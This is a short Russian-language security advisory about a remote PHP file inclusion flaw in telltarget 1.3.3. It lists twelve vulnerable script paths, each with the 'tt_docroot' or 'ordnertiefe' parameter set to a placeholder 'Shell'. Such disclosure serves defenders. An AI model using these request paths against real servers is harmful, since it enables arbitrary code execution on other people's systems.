Программа: telltarget 1.3.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «tt_docroot» и «ordnertiefe» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

[Path]/phplib/site_conf.php?ordnertiefe=Shell
[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии